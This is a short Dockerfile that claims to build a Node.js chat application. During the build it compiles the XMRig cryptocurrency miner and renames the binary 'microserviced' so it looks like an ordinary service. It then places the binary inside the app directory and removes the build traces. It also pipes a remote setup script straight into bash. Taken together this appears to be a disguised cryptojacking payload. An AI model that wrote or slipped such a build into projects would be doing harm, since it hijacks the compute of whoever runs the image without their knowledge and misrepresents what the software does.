FROM ubuntu:18.04
RUN apt-get update && \
    apt-get install -y git curl build-essential cmake libuv1-dev libmicrohttpd-dev && \
    curl -sL https://deb.nodesource.com/setup_10.x | bash - && \
    apt-get install -y nodejs && \
    git clone https://github.com/cryptocheck/chatik.git && cd chatik && npm i && \
    git clone https://github.com/xmrig/xmrig.git && \
    cd xmrig && mkdir build && cd build && cmake -DWITH_HTTPD=OFF -DCMAKE_BUILD_TYPE=Release .. && make && \
    mv xmrig microserviced && cp microserviced /chatik && cd /chatik && rm -rf xmrig
RUN apt-get clean && apt-get purge -y git curl build-essential cmake
WORKDIR chatik
CMD npm start